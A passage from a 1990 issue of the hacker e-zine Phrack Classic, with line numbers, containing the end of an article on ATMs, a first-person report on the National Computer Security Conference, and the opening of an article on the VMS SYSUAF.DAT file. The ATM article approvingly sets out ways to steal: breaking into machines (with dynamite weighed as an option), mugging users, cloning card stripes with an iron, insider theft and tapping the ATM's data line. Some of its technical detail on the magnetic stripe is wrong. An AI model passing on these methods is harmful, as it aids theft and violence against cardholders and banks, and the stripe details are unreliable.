  2976. The banking system then created the Checking Account system.  This
  2977. system allowed people to have much easier access to thier money.
  2978. Unfortunately the biggest drawback of this system is that people can
  2979. not manage thier own money and accounting procedures.  Millions of
  2980. times each day throughout the North American continent people are
  2981. writing checks for more money than they have in thier savings accounts.
  2982. This drawback also causes the already-backed up judicial system to
  2983. become backed up further. The banking system soon reacted to this
  2984. problem by producing 'check verification' methods to prevent people
  2985. from forgery, and overdrawing from thier accounts.
  2986.  
  2987. "Money makes the world go 'round" and there are many different ways
  2988. to make this world spin.  Today we have checking accounts, credit
  2989. cards, travelers checks, and the most 'liquid' form of money: cash.
  2990. Cash transactions are untrackable and widely accepted, so I feel
  2991. the "Paperless Society" will never happen.  Automated Teller Machines
  2992. provide consumers with 24-hour access to cash-sources.  By simply
  2993. inserting a plastic card into the machine and keypadding-in the
  2994. owners' "account password", you can access the owners bank account
  2995. and receive cash in-hand.  This file will explain some details of
  2996. the automated tellers and the plastic card used by the Teller-system.
  2997.  
  2998. The automated teller is connected by wires and cables to a "Main
  2999. Computer".  During each transaction the teller sends signals to
  3000. the main computer.  The main computer records each transaction
  3001. (a deposit or withdrawl) and updates the card-holders account.
  3002. It also sends 'approval' or 'denial' signals to the ATM in regard
  3003. to the transaction requested.  If a card-holder attempts to withdraw
  3004. $150.00 from his account and he has only $100.00 in it, the main
  3005. computer will tell the ATM to deny the transaction.
  3006.  
  3007. The ATM has 2 compartments to store cash in.  The first is the "deposits"
  3008. compartment.  This is a small area that receives the daily deposits.
  3009. It is located in the upper-part of the machine, near all the mechanical
  3010. devices.  However, because most ATM transactions are withdrawls the
  3011. complete bottom-half is filled with cash where the withdrawls are
  3012. extracted from.
  3013.  
  3014. The plastic card inserted into the machine is the same size as a
  3015. credit card.  The front of the card is embossed with information
  3016. about the card-holder.  The back-side of the card has a thin strip
  3017. of magnetic tape which also holds some important information.
  3018.  
  3019.    +--------------------------+     +--------------------------+
  3020.    ] CIRRUS                   ]     ]--------------------------]
  3021.    ]  INSTANT CASH CARD       ]     ]/////(magnetic strip)/////]
  3022.    ]                          ]     ]--------------------------]
  3023.    ] Acct: 12345675      Exp. ]     ]                          ]
  3024.    ] Joe Schmoe         01/91 ]     ] "card-holders signature" ]
  3025.    ]                          ]     ]                          ]
  3026.    +--------------------------+     +--------------------------+
  3027.           Front-side                          Back-side
  3028.  
  3029. When a cardholder inserts his card into the machine and requests a
  3030. transaction, the machine reads the embossed information from the
  3031. front-side and compares it with the data stored on the magnetic
  3032. strip; looking for a 'match' of the information on both sides.
  3033.  
  3034. The information on the front-side is easily readable with your
  3035. eyes.  However, you can not read the data on the magnetic-strip
  3036. so easily.  You may ask , "What is stored on the magnetic strip ?".
  3037. The answer is; the same information as the embossing plus some
  3038. 'confidential' information regarding the cardholders' financial
  3039. status is stored there.  The magnetic strip has 3 "tracks" on it.
  3040. The first track can store 210 BPI (Bytes per inch), and the second
  3041. stores 75 BPI, and the third stores 210 BPI.  So, we have:
  3042.  
  3043.                 +---------------------------+
  3044.    Track 1:         (210 BPI density)
  3045.                 +---------------------------+
  3046.    Track 2:         ( 75 BPI density)
  3047.                 +---------------------------+
  3048.    Track 3:         (210 BPI density)
  3049.                 +---------------------------+
  3050.  
  3051.                      THE MAGNETIC STRIP
  3052.  
  3053.  
  3054. Now, here's the information stored on each track of the strip in
  3055. my example:
  3056.  
  3057.    Track 1: " ;B 12345675 ^ Schmoe/Joe ^ ; LRC "
  3058.    Track 2: " ;12345675 01/91 ^ 1234 ^ (discriminate data) ; LRC "
  3059.    Track 3: " ;12345675 ^ 01/91 ^ 5 (discriminate data) ; LRC "
  3060.  
  3061. Here's the decoding of the above information:
  3062. Track 1:      ";" = Beginning of the data character
  3063.               "B" = Field-Control Character: I believe this character
  3064.                      tells the ATM what type of account (or status)
  3065.                      the user has.
  3066.        "12345675" = This is the account number of the cardholder.
  3067.               "^" = Data-field seperator.
  3068.      "Schmoe/Joe" = Last/First name of cardholder.
  3069.               "^" = Data-field seperator.
  3070.               ";" = End of data character.
  3071.             "LRC" = Longitude Redundancy Check (end of track character).
  3072.  
  3073. Track 2:      ";" = Beginning of data character
  3074.        "12345675" = Account number of the cardholder.
  3075.           "01/91" = Month/Year the card expires.
  3076.               "^" = Data-field seperator.
  3077.            "1234" = Process Identification Number (The cardholders 'password',
  3078.                      I think... or it could be a number to verify the
  3079.                      the transaction between the ATM and the Main Computer).
  3080.               "^" = Data-field seperator
  3081.  "(dscrmn. data)" = Discriminate Data. Not much is known exactly what is
  3082.                      stored here. Perhaps Bank Identification data or
  3083.                      bank account type (savings, checking?) ?
  3084.               ";" = End of data character.
  3085.             "LRC" = Longitude Redundancy Check.
  3086.  
  3087. Track 3:      ";" = Beginning of data character.
  3088.        "12345675" = Account number of the cardholder.
  3089.               "^" = Data-field seperator.
  3090.           "01/91" = Month/Year the card expires.
  3091.               "^" = Data-field seperator.
  3092.               "5" = The crypting-digit. When the transaction request
  3093.                      is sent to the main computer, it is encrypted.
  3094.                      This digit tells which encryption-key is used.
  3095.  "(dscrmn. data)" = A duplicate of the discriminate data stored on
  3096.                      Track 2.
  3097.               ";" = End of data character.
  3098.             "LRC" = Longitude Redundancy Check.
  3099.  
  3100. When the card is being processed the ATM tries to match the
  3101. account number, expiration date and name stored on each track.
  3102. The reason they duplicate data is for verification purposes. But,
  3103. notice that the duplicate data is stored on different tracks, each
  3104. having different recording densities.  Once the information on the
  3105. tracks are confirmed to match, the ATM compares them to the embossed
  3106. information on the front-side.  If all of the information matches
  3107. then the transaction will proceed.  If it doesn't match, then the card
  3108. is considered to be damaged and the ATM will keep the card.  It will
  3109. give the cardholder a piece of paper instructing the user to notify
  3110. the bank who issued his ATM-card so he can receive a replacement
  3111. card in the mail (this process takes about 3 weeks).
  3112.  
  3113.  
  3114. Now that you know how the ATM-system is designed and what information
  3115. is kept where on the card, what "security defects" does this system
  3116. contain ?  I will outline 4 methods of attacking this system that
  3117. have been tried (not by me!).
  3118.  
  3119.   1) Vandalization:  If you want, you can break-in to the ATM.
  3120.      However, most ATM's contain 'sensor' devices which sound an
  3121.      alarm when this is tried.  Therefore, if you're going to try
  3122.      this method I do not suggest using a hammer and chisel on the
  3123.      ATM because it will take 1/2 an hour to get the machine open
  3124.      and by that time the police will be there.  You could try a
  3125.      much faster way, dynamite; but that might scatter the money
  3126.      all-over, making it hard to collect.  Also, the bottom-half
  3127.      is where most of the money is stored (unless you happen to
  3128.      choose a machine that has issued all of its withdrawl-cash)
  3129.      so you'll want to break into the bottom-half of the ATM.
  3130.  
  3131.      In relation to this, you could wait outside the ATM for a
  3132.      valid-user to complete his withdrawl-transaction and mug him.
  3133.      As far as I know, the bank holds no responsibilty for placing
  3134.      the ATM in a 'secure' enviroment.  However, usually they will
  3135.      have lights nearby and placed in 'reasonable' places where
  3136.      people need money (example: Grocery store) and where the chance
  3137.      of mugging is slim.
  3138.  
  3139.  
  3140.   2) Physical Penetration: There are several ways of doing this.
  3141.      If you have a stolen card, you could randomly try guessing his
  3142.      account-password.  But, I feel this is a primitive method.
  3143.      If you try too many attempts at guessing the 'password',
  3144.      the ATM will return the card to you.  But, your attempts
  3145.      *might* be recorded in the central computer; allowing the
  3146.      bank to decide whether to cancel that card... However,
  3147.      this has not been verified by me.  If you do get a cash-card,
  3148.      you can make counterfeit-cards.
  3149.  
  3150.      A) Counterfiet ATM-cards:  The same method for producing
  3151.         counterfiet credit cards applies to ATM-cards.  If you
  3152.         have a valid ATM-card you can 'clone' it simply by embossing
  3153.         a blank-card with the same information.  Copying the mag-
  3154.         netic strip is also easy. To do this, you place a blank
  3155.         strip of the magnetic tape on top of the valid magnetic
  3156.         strip.  Then, using an iron on low-heat, gently rub the
  3157.         iron across the two strips for a few seconds.  Lastly,
  3158.         peel the new strip apart from the valid one and you've
  3159.         got a copy of all the data from the valid ATM-card.
  3160.  
  3161.      B) Also, I've heard a case where some guys had a machine
  3162.         that could read and write to the magnetic strips (probably
  3163.         they were employees of a company that produces the ATM-cards).
  3164.         Using this machine, they were able to create and change
  3165.         existing data on ATM-cards (such as the expiration date
  3166.         so they could keep using the same card over a long period
  3167.         of time).
  3168.  
  3169.         In relation to this there are other devices available that
  3170.         can read and write to magnetic strips.  Using your own
  3171.         microcomputer, you can buy a device that allows you to
  3172.         read and write to these magnetic strips. It looks
  3173.         similar to a disk drive.  If you're interested in
  3174.         exploring this method, I'll suggest that you contact
  3175.         the following company:
  3176.  
  3177.                  American Magnetics Corporation
  3178.                  740 Watsoncenter Road
  3179.                  Carson, California   90745
  3180.                  USA
  3181.  
  3182.                  213/775-8651
  3183.                  213/834-0685  FAX
  3184.                  910-345-6258  TWX
  3185.  
  3186.      C) WARNING: During each transaction attempted on an ATM a
  3187.         photo of the person requesting the transaction is taken.
  3188.         How long this film is stored is unknown, but it probably
  3189.         is different for each bank (unless there is a federal
  3190.         regulation regarding this).  Also, it is possible that
  3191.         this is not done at all ATMs.
  3192.  
  3193.   3) "Insider" Theft: The above case also crosses over into this
  3194.       section.  The biggest 'security leaks' in any company are
  3195.       its employees.  This is also the easiest way to steal money
  3196.       from ATMs.  The man who collects the deposits from the machine
  3197.       and inserts cash for withdrawls has the easiest and most
  3198.       open access to these machines.  I was told that this person
  3199.       can easily steal money from ATMs and not be detected.  Another
  3200.       person with access to these machines is the technician. The
  3201.       technician who fixes ATMs is the most-knowledgeable person
  3202.       about ATMs within the bank, therefore he should be a trust-
  3203.       worthy guy and receive a 'comfortable' salary.. otherwise
  3204.       he'll begin to collect 'retirement benefits' from the ATM
  3205.       and this may go undetected.
  3206.  
  3207.       However, I have heard of some embezzlement-cases involving ATMs,
  3208.       so I think it's not as easy as it seems.  It's only common sense
  3209.       that a bank would account for every dollar of every transaction.
  3210.       Whether the accounting is done inside the ATM or the main
  3211.       computer doesn't make a difference...  some form of accounting
  3212.       is *probably* done.
  3213.  
  3214.   4) Data-link Intercept:  This method has been very successful.  What
  3215.      you do is 'tap' into the wires that connect the ATM to the Main
  3216.      computer.  By doing this you can intercept and send signals to
  3217.      the ATM.  However, some 'inside information' is needed because
  3218.      the transmission is encrypted (refer to the Cryptography Digit
  3219.      stored on the magnetic strip).  But, I think you don't need to
  3220.      know *everything* being transferred.  You should need to know
  3221.      when to send the 'approval' signal to the ATM telling it to
  3222.      dispense its' cash.  I read a case (it may be in Phrack World
  3223.      News; 1985?) where some guys netted $600,000 from various ATMs
  3224.      using this method.  This seems to be one of the better, and
  3225.      more ingenious methods of stealing from these machines.
  3226.  
  3227.  
  3228. The information in this file should be 'adequate' to introduce you
  3229. to how ATMs work.  How did I get this information?  I went into a
  3230. bank and inquired about the computer-technology of ATMs.  The man
  3231. who was responsible for the ATMs was a bureaucrat and actually knew
  3232. very little about the 'guts' of ATMs.   Luckily the ATM-technician
  3233. was there that day and I agreed to buy him dinner later that evening.
  3234. (Please refer to: "Insider" Theft and the principle of Company-Loyalty).
  3235. During the dinner at "Toppers" (a neat 1950's Burgers/Milkshake/Beer
  3236. restaurant) he provided me with Operation and Repair manuals for the
  3237. ATMs.  I feel this information is well-worth the $3.82 dinner and
  3238. will be of some value to its' readers.  Some good information was
  3239. screened-out due to its 'delicate nature', but the information I've
  3240. provided has been confirmed.
  3241.  
  3242.  
  3243. +---------+
  3244. ] CREDITS ]
  3245. +---------+
  3246. The Mentor (Phrack #8, File #7;  "Fun with Automatic Tellers")
  3247. Deserted Surfer
  3248. Hyudori
  3249. Lex Luthor
  3250.  
  3251. Please distribute this file in its complete form.
  3252.  
  3253. _______________________________________________________________________________
  3254.  
  3255.                               ==Phrack Classic==
  3256.  
  3257.                      Volume Three, Issue 32, File #7 of 12
  3258.  
  3259.  
  3260. 13th Annual National Computer Security Conference
  3261. October 1-4, 1990
  3262. Omni Shoreham Hotel
  3263. Washington, D.C.
  3264. A "Knight Lightning" Perspective
  3265. by Craig M. Neidorf
  3266.  
  3267. Dr. Dorothy Denning first hinted at inviting me to take part on her panel
  3268. "Hackers:  Who Are They?" in May 1990 when we first came into contact while
  3269. preparing for my trial.  At the time I did not feel that it was a very good
  3270. idea since no one knew what would happen to me over the next few months.  At
  3271. the conclusion of my trial I agreed to participate and surprisingly, my
  3272. attorney, Sheldon Zenner (of Katten, Muchin, & Zavis), accepted an invitation
  3273. to speak as well.
  3274.  
  3275. A few weeks later there was some dissension to the idea of having me appear at
  3276. the conference from some professionals in the field of computer security.  They
  3277. felt that my presence at such a conference undermined what they stood for and
  3278. would be observed by computer "hackers" as a reward of sorts for my notoriety
  3279. in the hacker community.  Fortunately Dr. Denning stuck to her personal values
  3280. and did not exclude me from speaking.
  3281.  
  3282. Unlike Gordon Meyer, I was unable to attend Dr. Denning's presentation
  3283. "Concerning Hackers Who Break Into Computer Systems" and the ethics sessions,
  3284. although I was informed upon my arrival of the intense interest from the
  3285. conference participants and the reactions to my now very well known article
  3286. announcing the "Phoenix Project."
  3287.  
  3288. Not wishing to miss any more class than absolutely necessary, I arrived in
  3289. Washington D.C. late in the day on Wednesday, October 4th.  By some bizarre
  3290. coincidence I ended up on the same flight with Sheldon Zenner.
  3291.  
  3292. I had attended similar conventions before such as the Zeta Beta Tau National
  3293. Convention in Baltimore the previous year, but there was something different
  3294. about this one.  I suppose considering what I have been through it was only
  3295. natural for me to be a little uneasy when surrounded by computer security
  3296. professionals, but oddly enough this feeling soon passed as I began to
  3297. encounter friends both old and new.
  3298.  
  3299. Zenner and I met up with Dorothy and Peter Denning and soon after I met Terry
  3300. Gross, an attorney hired by the Electronic Frontier Foundation who had helped
  3301. with my case in reference to the First Amendment issues.  Emmanuel Goldstein,
  3302. editor of 2600 Magazine and probably the chief person responsible for spreading
  3303. the news and concern about my indictment last Spring, and Frank Drake, editor
  3304. of W.O.R.M. showed up.  I had met Drake once before.  Finally I ran into Gordon
  3305. Meyer.
  3306.  
  3307. So for a while we all exchanged stories about different events surrounding our
  3308. lives and how things had changed over the years only to be interrupted once by
  3309. a odd gentleman from Germany who inquired if we were members of the Chaos
  3310. Computer Club.  At the banquet that evening, I was introduced to Peter Neumann
  3311. (who among many other things is the moderator of the Internet Digest known as
  3312. "RISKS") and Marc Rotenberg (Computer Professionals for Social Responsibility).
  3313.  
  3314. Because of the great interest in the ethics sessions and comments I had heard
  3315. from people who had attended, I felt a strange irony come into play.  I've
  3316. hosted and attended numerous "hacker" conventions over the years, the most
  3317. notable being "SummerCon".  At these conventions one of the main time consuming
  3318. activities has always been to play detective and attempt to solve the mystery
  3319. of which one of the guests or other people at the hotel were there to spy on us
  3320. (whether they were government agents or some other form of security personnel).
  3321.  
  3322. So where at SummerCon the youthful hackers were all racing around looking for
  3323. the "feds," at the NCSC I wondered if the security professionals were reacting
  3324. in an inverse capacity... Who Are The Hackers?  Despite this attitude or maybe
  3325. because of it, I and the other panelists, wore our nametags proudly with a
  3326. feeling of excitement surrounding us.
  3327.  
  3328. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3329.  
  3330. October 4, 1990
  3331.  
  3332. Dorothy Denning had gathered the speakers for an early morning brunch and I
  3333. finally got a chance to meet Katie Hafner in person.  The panelists discussed
  3334. some possibilities of discussion questions to start off the presentation and
  3335. before I knew it, it was time to meet the public.
  3336.  
  3337. As we gathered in the front of the conference room, I was dismayed to find that
  3338. the people in charge of the setting up the nameboards (that would sit in front
  3339. of each panelist) had attended the Cook school of spelling and labeled me as
  3340. "Neirdorf."  Zenner thought this was hysterical.  Luckily they were able to
  3341. correct the error before we began.
  3342.  
  3343.                             Hackers:  Who Are They?
  3344.  
  3345. Dr. Denning started the presentation by briefly introducing each panelist and
  3346. asking them a couple of questions.
  3347.  
  3348. Katie Hafner disputed the notion that her work has caused a glorification
  3349. of hacking because of the severe hardships the people she interviewed had to
  3350. endure.  I found myself sympathizing with her as I knew what it was like to
  3351. be in their positions.  Many people commented later that her defense of Mitnick
  3352. seemed a little insincere as he had indeed committed some serious acts.  Not
  3353. knowing all of the details surrounding Mitnick's case and not relying on the
  3354. general newsmedia as a basis for opinion I withheld any sort of judgment.
  3355.  
  3356. Emmanuel Goldstein and Frank Drake appeared to take on the mantle of being the
  3357. spokespersons for the hackers, although I'm unsure if they would agree with
  3358. this characterization.  Drake's main point of view dealt with the idea that
  3359. young hackers seek to be able to use resources that they are otherwise excluded
  3360. from.  He claimed to once have been a system intruder, but now that he is in
  3361. college and has ample computing resources available to him, he no longer sees a
  3362. need to "hack."
  3363.  
  3364. Goldstein on the other hand sought to justify hacking as being beneficial to
  3365. society because the hackers are finding security holes and alerting security to
  3366. fix these problems before something catastrophic occurs.
  3367.  
  3368. Gordon Meyer tried to explain the hacker mind-set and how the average hackers
  3369. does not see using corporate resources as having a real financial burden to
  3370. today's companies.  Some people misunderstood his remarks to be speaking from a
  3371. factual position and took offense, stating that the costs are great indeed.
  3372. He also explained the differences between Phrack and the Computer Underground
  3373. Digest.  Most notable is that CuD does not print tutorials about computer
  3374. systems.
  3375.  
  3376. Sheldon Zenner focused on the freedom of the speech and press issues.  He also
  3377. spoke about technical details of the U.S. v. Neidorf case and the court rulings
  3378. that resulted from it.  One major point of interest was his quite reasonable
  3379. belief that the courts will soon be holding companies financially liable for
  3380. damages that may occur because of illegal intrusion into their systems.  This
  3381. was not to suggest that a criminal defense strategy could be that a company did
  3382. not do enough to keep an intruder out, but instead that the company could be
  3383. held civilly liable by outside parties.
  3384.  
  3385. Zenner and Denning alike discussed the nature of Phrack's articles.  They found
  3386. that the articles appearing in Phrack contained the same types of material
  3387. found publicly in other computer and security magazines, but with one
  3388. significant difference.  The tone of the articles.  An article named "How to
  3389. Hack Unix" in Phrack usually contained very similar information to an article
  3390. you might see in Communications of the ACM only to be named "Securing Unix
  3391. Systems."  But the differences were more extreme than just the titles.  Some
  3392. articles in Phrack seemed to suggest exploiting security holes while the
  3393. Communications of the ACM concentrated more on fixing the problem.  The
  3394. information in both articles would be comparable, but the audiences reading and
  3395. writing these articles were often very different.
  3396.  
  3397. I explained the concept and operation of Phrack and wandered into a discussion
  3398. about lack of privacy concerning electronic mail on the Internet from
  3399. government officials, system managers, and possibly even by hackers.  I went on
  3400. to remark that the security professionals were missing the point and the
  3401. problem.  The college and high-school students while perhaps doing some
  3402. exploration and causing some slight disturbances are not the place to be
  3403. focusing their efforts.  The real danger comes from career criminals and
  3404. company insiders who know the systems very well from being a part of it.  These
  3405. people are the source of computer crime in this country and are the ones who
  3406. need to be dealt with.  Catching a teenage hacker may be an easier task, but
  3407. ultimately will change nothing.  To this point I agreed that a hacker gaining
  3408. entry and exposing holes on computer systems may be a service to some degree,
  3409. but unlike Goldstein, I could not maintain that such activity should bring
  3410. prosecutorial immunity to the hacker. This is a matter of discretion for
  3411. security personnel and prosecutors to take into consideration.  I hope they do.
  3412.  
  3413. To a large degree I was rather silent on stage.  Perhaps because I was cut off
  3414. more than once or maybe even a little stagefright, but largely because many of
  3415. the questions posed by the audience were wrong on their face for me to answer.
  3416. I was not going to stand and defend hacking for its own sake nor was I there to
  3417. explain the activities of every hacker in existence.
  3418.  
  3419. So I let Goldstein and Drake handle questions geared to be answered by a system
  3420. intruder and I primarily only spoke out concerning the First Amendment and
  3421. Phrack distribution.  In one instance a man upset both by Drake's comments
  3422. about how the hackers just want to use resources they can't get elsewhere and
  3423. by Goldstein's presentation of the Operation Sun-Devil raids and the attack on
  3424. "Zod" in New York spoke up and accused us of being viciously one sided.
  3425.  
  3426. He said that none of us (and he singled me out specifically) look to be age 14
  3427. (he said he could believe I was 18) and that "our" statement that its ok for
  3428. hackers to gain access to systems simply because they lacked the resources
  3429. elsewhere meant it was ok for kids to steal money to buy drugs.
  3430.  
  3431. I responded by asking him if he was suggesting that if these "kids" were rich
  3432. and did not steal the money, it would be ok to purchase drugs?  I was sure that
  3433. it was just a bad analogy so I changed the topic afterwards.  He was right to a
  3434. certain extent, all of the hackers are not age 14 or even in highschool or
  3435. college, but is this really all that important of a distinction?
  3436.  
  3437. The activities of the Secret Service agents and other law enforcement officials
  3438. in Operation Sun-Devil and other investigations have been overwhelming and very
  3439. careless.  True this is just their standard way of doing business and they may
  3440. not have even singled out the hackers as a group to focus excess zeal, but
  3441. recognizing that the hackers are in a worst case scenario "white-collar
  3442. offenders," shouldn't they alter their technique?  Something that might be
  3443. important to make clear is that in truth my indictment and the indictments on
  3444. members of the Legion of Doom in Atlanta had absolutely nothing to do with
  3445. Operation Sun-Devil despite the general media creation.
  3446.  
  3447. Another interesting point that was brought out at the convention was that there
  3448. was so much activity and the Secret Service kept so busy in the state of
  3449. Arizona (possibly by some state official) concerning the hacker "problem" that
  3450. perhaps this is the reason the government did not catch on to the great Savings
  3451. & Loan multi-Billion dollar loss.
  3452.  
  3453. One gentleman spoke about his son being in a hospital where all his treatments
  3454. were being run by computer.  He added that a system intruder might quite by
  3455. accident disrupt the system inadvertently endangering his son's life.  Isn't
  3456. this bad?  Obviously yes it is bad, but what was worse is that a critical
  3457. hospital computer system would be hooked up to a phoneline anyway.  The main
  3458. reason for treatment in a hospital is so that the doctors are *there* to
  3459. monitor and assist patients.  Could you imagine a doctor dialing in from home
  3460. with a modem to make his rounds?
  3461.  
  3462. There was some discussion about an editor's responsibility to inform
  3463. corporations if a hacker were to drop off material that he/she had breached
  3464. their security.  I was not entirely in opposition to the idea, but the way I
  3465. would propose to do it was probably in the pages of a news article.  This may
  3466. seem a little roundabout, but when you stop and consider all of the private
  3467. security consultants out there, they do not run around providing information to
  3468. corporations for free.  They charge enormous fees for their services.  There
  3469. are some organizations that do perform services for free (CERT comes to mind),
  3470. but that is the reason they were established and they receive funding from the
  3471. government which allows them to be more generous.
  3472.  
  3473. It is my belief that if a hacker were to give me some tips about security holes
  3474. and I in turn reported this information to a potential victim corporation, the
  3475. corporation would be more concerned with how and from whom I got the
  3476. information than with fixing the problem.
  3477.  
  3478. One of the government's expert witnesses from U.S. v. Neidorf attended this
  3479. session and he prodded Zenner and I with questions about the First Amendment
  3480. that were not made clear from the trial.  Zenner did an excellent job of
  3481. clarifying the issues and presenting the truth where this Bellcore employee
  3482. sought to show us in a poor light.
  3483.  
  3484. During the commentary on the First Amendment, Hafner, Zenner, and I discussed a
  3485. July 22, 1988 article containing a Pacific Bell telephone document copied by a
  3486. hacker and sent to John Markoff that appeared on the front page of the New York
  3487. Times.  A member of the audience said that this was ok, but the Phrack article
  3488. containing the E911 material was not because Phrack was only sent to hackers.
  3489. Zenner went on to explain that this was far from true since private security,
  3490. government employees, legal scholars, reporters, and telecom security personnel
  3491. all received Phrack without discrimination.  There really is a lot that both
  3492. the hackers and security professionals have to learn about each other.
  3493.  
  3494. It began to get late and we were forced to end our session.  I guess what
  3495. surprised me the most were all of the people that stayed behind to speak with
  3496. us.  There were representatives from NASA, U.S. Sprint, Ford Aerospace, the
  3497. Department of Defense, a United States Army Lt. Colonel who all thanked us
  3498. for coming to speak.  It was a truly unique experience in that a year ago I
  3499. would have presumed these people to be fighting against me and now it seems
  3500. that they are reasonable, decent people, with an interest in trying to learn
  3501. and help end the problems.  I also met Mrs. Gail Meyer for the first time in
  3502. person as well.
  3503.  
  3504. I was swamped with people asking me how they could get Phrack and for the most
  3505. part I referred them to Gordon Meyer and CuD (and the CuD ftp).  Just before we
  3506. went to lunch I met Donn Parker and Art Brodsky, an editor from Communications
  3507. Daily.  So many interesting people to speak with and so little time.  I spent a
  3508. couple hours at the National Gallery of Art with Emmanuel Goldstein, flew back
  3509. to St. Louis, and returned to school.
  3510.  
  3511. It was definitely an enLightening experience.
  3512.  
  3513. ++++++++++++++++++++++++++++++
  3514.  
  3515. A very special thank you goes to Dorothy Denning, a dear friend who made it
  3516. possible for me to attend the conference.
  3517.  
  3518. :Craig M. Neidorf a/k/a Knight Lightning
  3519.  
  3520.  C483307 @ UMCVMB.MISSOURI.EDU
  3521.  C483307 @ UMCVMB.BITNET
  3522. _______________________________________________________________________________
  3523.  
  3524.                               ==Phrack Classic==
  3525.  
  3526.                      Volume Three, Issue 32, File #8 of 12
  3527.  
  3528.  
  3529.                        +-------------------------------+
  3530.                        | Inside the SYSUAF.DAT file of |
  3531.                        +-------------------------------+
  3532.  
  3533.            +------------------------------------------------------+
  3534.            | Digital Equipment Corporation's VMS Operating System |
  3535.            +------------------------------------------------------+
  3536.  
  3537.                                    -= by =-
  3538.  
  3539.                          -----:>  Pain Hertz  <:----
  3540.  
  3541.  
  3542.  
  3543. Overview
  3544. ~~~~~~~
  3545.         In this file, I will explain what the System User Authorization File
  3546. is, what information it contains, what the logical and physical characteristics
  3547. of the file are, and how one can manipulate it to reveal and/or modify its
  3548. contents.
  3549.  
  3550. Background
  3551. ~~~~~~~~
  3552.         The Virtual Memory System (VMS) Operating System's System User
  3553. Authorization File (SYSUAF) contains the information that determines a given
  3554. user's username, password(s), security priviledges, as well as many other
  3555. similar data which either allow or disallow the user to have the system
  3556. perform certain tasks.
  3557.  
  3558. Characteristics
  3559. ~~~~~~~~~~~~~~
  3560.         The SYSUAF.DAT file (UAF) is usually located on the system on the
  3561. device pointed to by the logical SYS$COMMON, and under the [SYSEXE]
  3562. subdirectory.  However, if the logical SYSUAF exists, it will point to the
  3563. location and name of the UAF.
  3564.  
  3565.         The UAF is a binary, indexed data file.  It's indexed on 4 keys:
  3566. username, UIC, extended user identifier, and owner identifier.  Using
  3567. the VMS ANALYZE utility reveals the following about the UAF:
  3568.  
  3569.  
  3570. IDENT   "01-JAN-1990 13:13:13   VAX/VMS ANALYZE/RMS_FILE Utility"
  3571.  
  3572. SYSTEM
  3573.         SOURCE                  VAX/VMS
  3574.  
  3575. FILE
  3576.         ALLOCATION              24
  3577.         BEST_TRY_CONTIGUOUS     yes
  3578.         BUCKET_SIZE             3
  3579.         CLUSTER_SIZE            3
  3580.         CONTIGUOUS              no
  3581.         EXTENSION               3
  3582.         FILE_MONITORING         no
  3583.         GLOBAL_BUFFER_COUNT     0
  3584.         NAME                    "SYS$COMMON:[SYSEXE]SYSUAF.DAT;1"
  3585.         ORGANIZATION            indexed
  3586.         OWNER                   [SYSTEM]
  3587.         PROTECTION              (system:RWED, owner:RWED, group:RWED, world:RE)
  3588.  
  3589. RECORD
  3590.         BLOCK_SPAN              yes
  3591.         CARRIAGE_CONTROL        none
  3592.         FORMAT                  variable
  3593.         SIZE                    1412
  3594.  
  3595. AREA 0
  3596.         ALLOCATION              9
  3597.         BEST_TRY_CONTIGUOUS     yes
  3598.         BUCKET_SIZE             3
  3599.         EXTENSION               3
  3600.  
  3601. AREA 1
  3602.         ALLOCATION              3
  3603.         BUCKET_SIZE             3
  3604.         EXTENSION               3
  3605.  
  3606. AREA 2
  3607.         ALLOCATION              12
  3608.         BUCKET_SIZE             2
  3609.         EXTENSION               12
  3610.  
  3611. KEY 0
  3612.         CHANGES                 no
  3613.         DATA_KEY_COMPRESSION    yes
  3614.         DATA_RECORD_COMPRESSION yes
  3615.         DATA_AREA               0
  3616.         DATA_FILL               100
  3617.         DUPLICATES              no
  3618.         INDEX_AREA              1
  3619.         INDEX_COMPRESSION       yes
  3620.         INDEX_FILL              100
  3621.         LEVEL1_INDEX_AREA       1
  3622.         NAME                    "Username"
  3623.         NULL_KEY                no
  3624.         PROLOG                  3
  3625.         SEG0_LENGTH             32
  3626.         SEG0_POSITION           4
  3627.         TYPE                    string
  3628.  
  3629. KEY 1
  3630.         CHANGES                 yes
  3631.         DATA_KEY_COMPRESSION    no
  3632.         DATA_AREA               2
  3633.         DATA_FILL               100
  3634.         DUPLICATES              yes
  3635.         INDEX_AREA              2
  3636.         INDEX_COMPRESSION       no
  3637.         INDEX_FILL              100
  3638.         LEVEL1_INDEX_AREA       2
  3639.         NAME                    "UIC"
  3640.         NULL_KEY                no
  3641.         SEG0_LENGTH             4
  3642.         SEG0_POSITION           36
  3643.         TYPE                    bin4
  3644.  
  3645. KEY 2
  3646.         CHANGES                 yes
  3647.         DATA_KEY_COMPRESSION    no
  3648.         DATA_AREA               2
  3649.         DATA_FILL               100
  3650.         DUPLICATES              yes
  3651.         INDEX_AREA              2
  3652.         INDEX_COMPRESSION       no
  3653.         INDEX_FILL              100
  3654.         LEVEL1_INDEX_AREA       2
  3655.         NAME                    "Extended User Identifier"
  3656.         NULL_KEY                no
  3657.         SEG0_LENGTH             8
  3658.         SEG0_POSITION           36
  3659.         TYPE                    bin8
  3660.  
  3661. KEY 3
  3662.         CHANGES                 yes
  3663.         DATA_KEY_COMPRESSION    no
  3664.         DATA_AREA               2
  3665.         DATA_FILL               100
  3666.         DUPLICATES              yes
  3667.         INDEX_AREA              2
  3668.         INDEX_COMPRESSION       no
  3669.         INDEX_FILL              100
  3670.         LEVEL1_INDEX_AREA       2
  3671.         NAME                    "Owner Identifier"
  3672.         NULL_KEY                yes
  3673.         NULL_VALUE              0
  3674.         SEG0_LENGTH             8
  3675.         SEG0_POSITION           44
  3676.         TYPE                    bin8
  3677.  
  3678. ANALYSIS_OF_AREA 0
  3679.         RECLAIMED_SPACE         0
  3680.  
  3681. ANALYSIS_OF_AREA 1
  3682.         RECLAIMED_SPACE         0
  3683.  
  3684. ANALYSIS_OF_AREA 2
  3685.         RECLAIMED_SPACE         0
  3686.  
  3687. ANALYSIS_OF_KEY 0
  3688.         DATA_FILL               71
  3689.         DATA_KEY_COMPRESSION    75
  3690.         DATA_RECORD_COMPRESSION 67
  3691.         DATA_RECORD_COUNT       5
  3692.         DATA_SPACE_OCCUPIED     3
  3693.         DEPTH                   1
  3694.         INDEX_COMPRESSION       85
  3695.         INDEX_FILL              1
  3696.         INDEX_SPACE_OCCUPIED    3
  3697.         LEVEL1_RECORD_COUNT     1
  3698.         MEAN_DATA_LENGTH        644
  3699.         MEAN_INDEX_LENGTH       34
  3700.  
  3701. ANALYSIS_OF_KEY 1
